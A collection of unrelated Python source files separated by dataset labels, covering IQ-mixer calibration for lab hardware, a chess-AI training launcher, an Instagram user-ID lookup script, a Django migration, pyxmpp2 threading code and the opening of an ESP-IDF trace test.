self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65,
param_guess=([85, 85, 0.9, 0.9, 0.05, -0.02]), phase_step=5, q_step=0.1, vi_step=0.005, vq_step=0.005,
plot_traces=True, awg_delay_time=0.1, averages=5, HDAWG_ports=[3, 4],
oscillator=[1, 2]):
""" Instantiate IQ optimizer
:param mw_source: instance of microwave source client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequencies
:kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg min_pow: noise floor
:kwarg param_guess: starting parameters for optimization:
([phase shift 1, phase shift 2,
q := (amp_i/amp_q) amplitude imbalance 1, amplitude imbalance 2
dc_offset_i, dc_offset_q])
:kwarg phase_step: step size for phase parameter in gradient descent
:kwarg q_step: step size for amplitude imbalance parameter in gradient descent
:kwarg vi_step: step size for dc I offset parameter in gradient descent
:kwarg vq_step: step size for dc Q parameter in gradient descent
:kwarg awg_delay_time: time to wait after setting awg parameters
:kwarg averages: number of measurement for single point power measurement
:kwarg HDAWG_ports: which wave ports to use on the HDAWG
:kwarg oscillator: which oscillator to use on the HDAWG
"""
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator[0] - 1), signal_freq[0])
hd.setd('oscs/{}/freq'.format(oscillator[1] - 1), signal_freq[1])
# assign oscillators to correct outputs
# for first output
hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[1] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[1] - 1)
# for second output
hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[1] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[1] - 1)
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.min_power = min_power
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate step sizes
self.phase_step = phase_step
self.q_step = q_step
self.vi_step = vi_step
self.vq_step = vq_step
#Instantiate initial guesses
self.phase_guess = [param_guess[0], param_guess[1]]
self.q_guess = [param_guess[2], param_guess[3]]
self.dc_i_guess = param_guess[4]
self.dc_q_guess = param_guess[5]
# Instantiate params we will optimize
self.opt_phase = np.zeros(2)
self.opt_q = np.zeros(2)
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
# set initial guess parameters
self.set_phase_and_amp(self.phase_guess[0], self.q_guess[0], 0)
self.set_phase_and_amp(self.phase_guess[1], self.q_guess[1], 1)
self.set_dc_offsets(self.dc_i_guess, self.dc_q_guess)
# Enable signal
self.hd.seti('awgs/{}/enable'.format(int(np.floor((HDAWG_ports[1] - 1) / 2))), 1)
self.set_markers(1)
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
def set_markers(self, signal):
# signal: 0 or 1, refers two first or second frequency
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq[signal])
self.sa.set_frequency_span(6 * self.signal_freq[signal])
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq[signal], self.carrier - self.signal_freq[signal], self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self, signal):
#set the markers for the sideband we are currently looking at
if self.plot_traces == True:
self.plot_traces = False
self.set_markers(signal)
self.plot_traces = True
else:
self.set_markers(signal)
#gradient descent starting point
phase = self.phase_guess[signal]
q = self.q_guess[signal]
self.set_phase_and_amp(phase, q, signal)
curr_power = self._average_marker_power(self.lower_sb_marker)
#store power values for every iteration
power_vec = [curr_power]
# initialize step sizes and iteration number
num_iterations = 0
phase_step = self.phase_step
q_step = self.q_step
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_phase_and_amp(phase, q, signal, phase_step, q_step)
phase_new = phase - grad[0] * phase_step
q_new = q - grad[1] * q_step
self.set_phase_and_amp(phase_new, q_new, signal)
new_power = self._average_marker_power(self.lower_sb_marker)
if new_power < curr_power:
curr_power = new_power
phase = phase_new
q = q_new
else:
phase_step = phase_step / 2
q_step = q_step / 2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_phase[signal] = phase
self.opt_q[signal] = q
self.set_phase_and_amp(self.opt_phase[signal], self.opt_q[signal], signal)
if self.plot_traces == True:
plt.plot(power_vec, label='lower sideband for frequency {}'.format(signal))
def opt_carrier(self):
#gradient descent starting point
vi = self.dc_i_guess
vq = self.dc_q_guess
self.set_dc_offsets(vi, vq)
curr_power = self._average_marker_power(self.carrier_marker)
#store power values for every iteration
power_vec = [curr_power]
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_dc_offsets(vi, vq)
vi_new = vi - grad[0] * self.vi_step
vq_new = vq - grad[1] * self.vq_step
self.set_dc_offsets(vi_new, vq_new)
new_power = self._average_marker_power(self.carrier_marker)
if new_power < curr_power:
curr_power = new_power
vi = vi_new
vq = vq_new
else:
self.vi_step = self.vi_step / 1.2
self.vq_step = self.vq_step / 1.2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + 'dBm')
self.dc_offset_i_opt = vi
self.dc_offset_q_opt = vq
self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)
if self.plot_traces == True:
plt.plot(power_vec, label='carrier band')
plt.xlabel('iteration #')
plt.ylabel('power [dBm]')
plt.legend()
def opt(self):
self.opt_lower_sideband(0)
self.hd.log.info('Lower sideband power for 1st frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_lower_sideband(1)
self.hd.log.info('Lower sideband power for second frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_carrier()
time.sleep(1)
#self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def set_phase_and_amp(self, phase, q, signal):
amp_i = 2. * q / (1 + q)
amp_q = 2. * 1 / (1 + q)
dphase_i = np.arccos(amp_i / 2) * 180 / np.pi
dphase_q = np.arccos(amp_q / 2) * 180 / np.pi
# Set i and q amplitudes
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[0] - 1) / 2)),
np.mod(self.HDAWG_ports[0] - 1, 2),
2 * signal), phase + dphase_i)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[0] - 1) / 2)),
np.mod(self.HDAWG_ports[0] - 1, 2),
2 * signal + 1), phase - dphase_i)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[1] - 1) / 2)),
np.mod(self.HDAWG_ports[1] - 1, 2),
2 * signal), dphase_q)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[1] - 1) / 2)),
np.mod(self.HDAWG_ports[1] - 1, 2),
2 * signal + 1), -dphase_q)
def set_dc_offsets(self, v1, v2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def calc_slope_phase_and_amp(self, phase, q, signal, phase_step, q_step):
self.set_phase_and_amp(phase + phase_step, q, signal)
phase_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase - phase_step, q, signal)
phase_m = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q + q_step, signal)
q_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q - q_step, signal)
q_m = self._average_marker_power(self.lower_sb_marker)
return([(phase_p - phase_m) / 2, (q_p - q_m) / 2])
def calc_slope_dc_offsets(self, vi, vq):
self.set_dc_offsets(vi + self.vi_step, vq)
vi_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi - self.vi_step, vq)
vi_m = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq + self.vq_step)
vq_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq - self.vq_step)
vq_m = self._average_marker_power(self.carrier_marker)
return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2])
|
nilq/baby-python
|
python
|
import unittest
from runner.robot.zipper import zip_robot
class RobotChanges(unittest.TestCase):
def test_set_new_robot_position(self):
robot1 = {
'part': {
'connects_to': [
{
'part': {
}
}
]
}
}
robot2 = {
'part': {
'connects_to': [
{
'part': {
'display_as': 'colored'
}
}
]
}
}
zip_robot(robot1, robot2)
self.assertEqual(robot1['part']['connects_to'][0]['part']['display_as'], 'colored')
|
nilq/baby-python
|
python
|
items = [
("Mosh", 100),
("Brad", 90),
("Ahmed", 10),
]
ratings = [items[1] for items in items] # Map Alternative
ratings = [items[1] for items in items if items[1] >= 20] # Filter Alternative
print(ratings)
|
nilq/baby-python
|
python
|
import sys
import chessai
def main():
# parse script args
startup_config = sys.argv[1] if len(sys.argv) >= 2 else 'all'
# launch the training according to the specified startup config
if startup_config == 'pretrain_fx': launch_pretrain_fx()
if startup_config == 'pretrain_ratings': launch_pretrain_ratings()
# TODO: add launching single other trainings here ...
elif startup_config == 'all':
launch_pretrain()
launch_pretrain_ratings()
# TODO: add launching other trainings here ...
else:
raise ValueError('Invalid args! Unknown training startup configuration {}!'.format(startup_config))
def launch_pretrain():
# launch entire pre-training
launch_pretrain_fx()
def launch_pretrain_fx():
params = {
'batch_size': 32,
'learn_rate': 0.2,
'epochs': 30,
'lr_decay_epochs': 3,
'lr_decay_rate': 0.5,
'log_interval': 100,
'total_train_batches': 2400, # TODO: find out the exact value
}
# create a new training session and launch the training
session = chessai.pretrain.DrawGenTrainingSession(params)
session.run_training()
# TODO: launch all other pre-train sessions here, too ...
def launch_pretrain_ratings():
# frozen fx settings
params = {
'batch_size': 32,
'learn_rate': 0.01,
'epochs': 30,
'lr_decay_epochs': 3,
'lr_decay_rate': 0.1,
'is_fx_trainable': False,
'log_interval': 100,
'total_train_batches': 2400, # TODO: find out the exact value
}
# create a new training session and launch the training
session = chessai.pretrain.RatingTrainingSession(params)
session.run_training()
# def get_instance_by_name(fq_classname: str):
# parts = kls.split('.')
# module = ".".join(parts[:-1])
# m = __import__( module )
# for comp in parts[1:]:
# m = getattr(m, comp)
# return m
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 26 20:48:30 2016
Convert Instagram handles to numeric IDs, which are needed as inputs
for API queries.
Sample output
ERROR: "not-a-handle" is not available
IG user data
------------
Platform: Instagram
Followers: 394
Handle: thedrawingroomcafe
ID: 1711102403
Full name: The Drawing Room
"""
import csv
import json
import requests
from bs4 import BeautifulSoup
import config_social_handles as config
def GetInstagramUserData(handle):
"""
Load the HTML for a user's profile on www.instagram.com.
Read fields like user's numeric id from the profile HTML.
Args
handle: <type 'str'> Name of Instagram user. If it contains '@'
then this will be remove.
Returns
out_dict: <type 'dict'> Dictionary of user fields and values.
"""
handle = handle.replace("@", "")
base = "http://instagram.com/%s/"
url = base % handle
# access webpage and convert to soup
req = requests.get(url)
soup = BeautifulSoup(req.text, "lxml")
# search for scripts
for script in soup.find_all(u"script", type=u"text/javascript"):
text = script.text
# break when desired script is reached
if "ProfilePage" in text:
break
# extract user profile from script and convert to JSON
json_start = text.find("{")
json_end = text.find(";")
json_string = text[json_start:json_end]
json_data = json.loads(json_string)
# get user data from JSON
# - use [0] as there is only one item
profile = json_data["entry_data"]["ProfilePage"][0]["user"]
# extract user details
out_dict = {}
out_dict["Platform"] = "Instagram"
out_dict["ID"] = profile["id"]
out_dict["Full name"] = profile["full_name"]
out_dict["Handle"] = handle # OR profile['username'] from API
out_dict["Followers"] = profile["followed_by"]["count"]
return out_dict
def main():
user_data = []
IG_users = config.IG_users
for h in IG_users:
try:
IG_user_data = GetInstagramUserData(h)
except ValueError:
IG_user_data = {"Handle": h, "ID": "NOT AVAILABLE"}
print 'ERROR: "%s" is not available' % h
print
user_data.append(IG_user_data)
print "IG user data"
print "------------"
for u in user_data:
for k, v in u.iteritems():
print "%s: %s" % (k, v)
print
out_name = "out_data.csv"
with open(out_name, "w") as csvfile:
fieldnames = ["Platform", "ID", "Handle", "Full name", "Followers"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for user in user_data:
# convert UTF-8 if unicode, otherwise do not convert
for key, value in user.iteritems():
if isinstance(value, unicode):
encoded_value = value.encode("utf-8")
user[key] = encoded_value
writer.writerow(user)
print "Done - %s" % out_name
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.1 on 2020-09-20 01:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('chapters', '0013_auto_20200920_0042'),
]
operations = [
migrations.RemoveField(
model_name='orderablecontent',
name='content_type',
),
migrations.RemoveField(
model_name='orderablecontent',
name='object_id',
),
]
|
nilq/baby-python
|
python
|
#
# (C) Copyright 2011 Jacek Konieczny <jajcus@jajcus.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""I/O Handling classes
This module has a purpose similar to :std:`asyncore` from the base library, but
should be more usable, especially for PyXMPP.
Also, these interfaces should allow building application not only in
asynchronous event loop model, but also threaded model.
"""
__docformat__ = "restructuredtext en"
import time
import threading
import logging
import sys
import queue
import inspect
from .interfaces import MainLoop, HandlerReady, PrepareAgain
from .interfaces import IOHandler, QUIT, EventHandler, TimeoutHandler
from .events import EventDispatcher
from ..settings import XMPPSettings
from .wait import wait_for_read, wait_for_write
logger = logging.getLogger("pyxmpp2.mainloop.threads")
class IOThread(object):
"""Base class for `ReadingThread` and `WrittingThread`.
:Ivariables:
- `name`: thread name (for debugging)
- `io_handler`: the I/O handler object to poll
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple for the
last exception raised in the thread.
- `exc_queue`: queue to put all exceptions raised in the thread.
:Types:
- `name`: `str`
- `io_handler`: `IOHandler`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
"""
def __init__(self, settings, io_handler, name, daemon = True,
exc_queue = None):
# pylint: disable=R0913
self.settings = settings if settings else XMPPSettings()
self.name = name
self.io_handler = io_handler
self.thread = threading.Thread(name = name, target = self._run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self._quit = False
def start(self):
"""Start the thread.
"""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def stop(self):
"""Request the thread to stop."""
self._quit = True
def join(self, timeout):
"""Join the thread (wait until it stops)."""
return self.thread.join(timeout)
def _run(self):
"""The thread function. Calls `self.run()` in loop and if it raises an
exception, stores it in self.exc_queue. If `exc_queue` is None
the exception will abort the thread.
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.run()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
def run(self):
"""The thread function."""
raise NotImplementedError
class ReadingThread(IOThread):
"""A thread reading from io_handler.
This thread will be also the one to call the `IOHandler.prepare` method
until HandlerReady is returned.
It can be used (together with `WrittingThread`) instead of
a main loop."""
def __init__(self, settings, io_handler, name = None, daemon = True,
exc_queue = None):
# pylint: disable=R0913
if name is None:
name = "{0!r} reader".format(io_handler)
IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)
def run(self):
"""The thread function.
First, call the handler's 'prepare' method until it returns
`HandlerReady` then loop waiting for the socket input and calling
'handle_read' on the handler.
"""
# pylint: disable-msg=R0912
interval = self.settings["poll_interval"]
prepared = False
timeout = 0.1
while not self._quit:
if not prepared:
logger.debug("{0}: preparing handler: {1!r}".format(
self.name, self.io_handler))
ret = self.io_handler.prepare()
logger.debug("{0}: prepare result: {1!r}".format(self.name,
ret))
if isinstance(ret, HandlerReady):
prepared = True
elif isinstance(ret, PrepareAgain):
if ret.timeout is not None:
timeout = ret.timeout
else:
raise TypeError("Unexpected result type from prepare()")
if self.io_handler.is_readable():
logger.debug("{0}: readable".format(self.name))
fileno = self.io_handler.fileno()
if fileno is not None:
readable = wait_for_read(fileno, interval)
if readable:
self.io_handler.handle_read()
elif not prepared:
if timeout:
time.sleep(timeout)
else:
logger.debug("{0}: waiting for readability".format(self.name))
if not self.io_handler.wait_for_readability():
break
class WrittingThread(IOThread):
"""A thread reading from io_handler.
It can be used (together with `WrittingThread`) instead of
a main loop."""
def __init__(self, settings, io_handler, name = None, daemon = True,
exc_queue = None):
# pylint: disable=R0913
if name is None:
name = "{0!r} writer".format(io_handler)
IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)
def run(self):
"""The thread function.
Loop waiting for the handler and socket being writable and calling
`interfaces.IOHandler.handle_write`.
"""
while not self._quit:
interval = self.settings["poll_interval"]
if self.io_handler.is_writable():
logger.debug("{0}: writable".format(self.name))
fileno = self.io_handler
if fileno:
writable = wait_for_write(fileno, interval)
if writable:
self.io_handler.handle_write()
else:
logger.debug("{0}: waiting for writaility".format(self.name))
if not self.io_handler.wait_for_writability():
break
class EventDispatcherThread(object):
"""Event dispatcher thread.
:Ivariables:
- `name`: thread name (for debugging)
- `event_queue`: the event queue to poll
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple whenever the
thread was aborted by an exception.
:Types:
- `name`: `str`
- `event_queue`: :std:`Queue.Queue`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
"""
def __init__(self, event_dispatcher, name = None,
daemon = True, exc_queue = None):
if name is None:
name = "event dispatcher"
self.name = name
self.thread = threading.Thread(name = name, target = self.run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self.event_dispatcher = event_dispatcher
def start(self):
"""Start the thread."""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def join(self, timeout):
"""Join the thread."""
return self.thread.join(timeout)
def run(self):
"""The thread function. Calls `self.run()` and if it raises
an exception, stores it in self.exc_info and exc_queue
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.event_dispatcher.loop()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
class TimeoutThread(object):
"""Thread to handle `TimeoutHandler` methods.
:Ivariables:
- `method`: the timout handler method
- `name`: thread name (for debugging)
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple whenever the
thread was aborted by an exception.
- `exc_queue`: queue for raised exceptions
:Types:
- `name`: `str`
- `method`: a bound method decorated with `interfaces.timeout_handler`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
- `exc_queue`: queue for raised exceptions
"""
def __init__(self, method, name = None, daemon = True, exc_queue = None):
if name is None:
name = "{0!r} timer thread"
self.name = name
self.method = method
self.thread = threading.Thread(name = name, target = self._run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self._quit = False
def start(self):
"""Start the thread.
"""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def stop(self):
"""Request the thread to stop."""
self._quit = True
def join(self, timeout):
"""Join the thread (wait until it stops)."""
return self.thread.join(timeout)
def _run(self):
"""The thread function. Calls `self.run()` and if it raises
an exception, stores it in self.exc_info
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.run()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
def run(self):
"""The thread function."""
# pylint: disable-msg=W0212
timeout = self.method._pyxmpp_timeout
recurring = self.method._pyxmpp_recurring
while not self._quit and timeout is not None:
if timeout:
time.sleep(timeout)
if self._quit:
break
ret = self.method()
if recurring is None:
timeout = ret
elif not recurring:
break
class ThreadPool(MainLoop):
"""Thread pool object, as a replacement for an asychronous event loop."""
# pylint: disable-msg=R0902
def __init__(self, settings = None, handlers = None):
self.settings = settings if settings else XMPPSettings()
self.io_handlers = []
self.timeout_handlers = []
self.event_queue = self.settings["event_queue"]
self.event_dispatcher = EventDispatcher(self.settings, handlers)
self.exc_queue = queue.Queue()
self.io_threads = []
self.timeout_threads = []
self.event_thread = None
self.daemon = False
if handlers:
for handler in handlers:
self.add_handler(handler)
def add_handler(self, handler):
if isinstance(handler, IOHandler):
self._add_io_handler(handler)
if isinstance(handler, EventHandler):
self.event_dispatcher.add_handler(handler)
if isinstance(handler, TimeoutHandler):
self._add_timeout_handler(handler)
def remove_handler(self, handler):
if isinstance(handler, IOHandler):
self._remove_io_handler(handler)
if isinstance(handler, EventHandler):
self.event_dispatcher.remove_handler(handler)
if isinstance(handler, TimeoutHandler):
self._remove_timeout_handler(handler)
def _add_io_handler(self, handler):
"""Add an IOHandler to the pool.
"""
self.io_handlers.append(handler)
if self.event_thread is None:
return
def _run_io_threads(self, handler):
"""Start threads for an IOHandler.
"""
reader = ReadingThread(self.settings, handler, daemon = self.daemon,
exc_queue = self.exc_queue)
writter = WrittingThread(self.settings, handler, daemon = self.daemon,
exc_queue = self.exc_queue)
self.io_threads += [reader, writter]
reader.start()
writter.start()
def _remove_io_handler(self, handler):
"""Remove an IOHandler from the pool.
"""
if handler not in self.io_handlers:
return
self.io_handlers.remove(handler)
for thread in self.io_threads:
if thread.io_handler is handler:
thread.stop()
def _add_timeout_handler(self, handler):
"""Add a TimeoutHandler to the pool.
"""
self.timeout_handlers.append(handler)
if self.event_thread is None:
return
self._run_timeout_threads(handler)
def _run_timeout_threads(self, handler):
"""Start threads for a TimeoutHandler.
"""
# pylint: disable-msg=W0212
for dummy, method in inspect.getmembers(handler, callable):
if not hasattr(method, "_pyxmpp_timeout"):
continue
thread = TimeoutThread(method, daemon = self.daemon,
exc_queue = self.exc_queue)
self.timeout_threads.append(thread)
thread.start()
def _remove_timeout_handler(self, handler):
"""Remove a TimeoutHandler from the pool.
"""
if handler not in self.timeout_handlers:
return
self.io_handlers.remove(handler)
for thread in self.timeout_threads:
if thread.handler_method.__self__ is handler:
thread.stop()
def start(self, daemon = False):
"""Start the threads."""
self.daemon = daemon
self.io_threads = []
self.event_thread = EventDispatcherThread(self.event_dispatcher,
daemon = daemon, exc_queue = self.exc_queue)
self.event_thread.start()
for handler in self.io_handlers:
self._run_io_threads(handler)
for handler in self.timeout_handlers:
self._run_timeout_threads(handler)
def stop(self, join = False, timeout = None):
"""Stop the threads.
:Parameters:
- `join`: join the threads (wait until they exit)
- `timeout`: maximum time (in seconds) to wait when `join` is
`True`). No limit when `timeout` is `None`.
"""
logger.debug("Closing the io handlers...")
for handler in self.io_handlers:
handler.close()
if self.event_thread.is_alive():
logger.debug("Sending the QUIT signal")
self.event_queue.put(QUIT)
logger.debug(" sent")
threads = self.io_threads + self.timeout_threads
for thread in threads:
logger.debug("Stopping thread: {0!r}".format(thread))
thread.stop()
if not join:
return
if self.event_thread:
threads.append(self.event_thread)
if timeout is None:
for thread in threads:
thread.join()
else:
timeout1 = (timeout * 0.01) / len(threads)
threads_left = []
for thread in threads:
logger.debug("Quick-joining thread {0!r}...".format(thread))
thread.join(timeout1)
if thread.is_alive():
logger.debug(" thread still alive".format(thread))
threads_left.append(thread)
if threads_left:
timeout2 = (timeout * 0.99) / len(threads_left)
for thread in threads_left:
logger.debug("Joining thread {0!r}...".format(thread))
thread.join(timeout2)
self.io_threads = []
self.event_thread = None
@property
def finished(self):
return self.event_thread is None or not self.event_thread.is_alive()
@property
def started(self):
return self.event_thread is not None
def quit(self):
self.event_queue.put(QUIT)
def loop(self, timeout = None):
if not self.event_thread:
return
interval = self.settings["poll_interval"]
if timeout is None:
while self.event_thread.is_alive():
self.loop_iteration(interval)
else:
timeout = time.time() + timeout
while self.event_thread.is_alive() and time.time() < timeout:
self.loop_iteration(interval)
def loop_iteration(self, timeout = 0.1):
"""Wait up to `timeout` seconds, raise any exception from the
threads.
"""
try:
exc_info = self.exc_queue.get(True, timeout)[1]
except queue.Empty:
return
exc_type, exc_value, ext_stack = exc_info
raise exc_type(exc_value).with_traceback(ext_stack)
|
nilq/baby-python
|
python
|
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:
@software: PyCharm
@time: 2019/11/30 20:03
"""
|
nilq/baby-python
|
python
|
from __future__ import unicode_literals
import os
import re
import tempfile
from io import open
import debug_backend
import ttfw_idf
@ttfw_idf.idf_example_test(env_tag='test_jtag_arm')
def test_examples_sysview_tracing_heap_log(env, extra_data):
rel_project_path = os.path.join('examples', 'system', 'sysview_tracing_heap_log')
dut = env.get_dut('sysview_tracing_heap_log', rel_project_path)
proj_path = os.path.join(dut.app.idf_path, rel_project_path)
elf_path = os.path.join(dut.app.binary_path, 'sysview_tracing_heap_log.elf')
def get_temp_file():
with tempfile.NamedTemporaryFile(delete=False) as f:
return f.name
try:
tempfiles = [get_temp_file(), get_temp_file()]
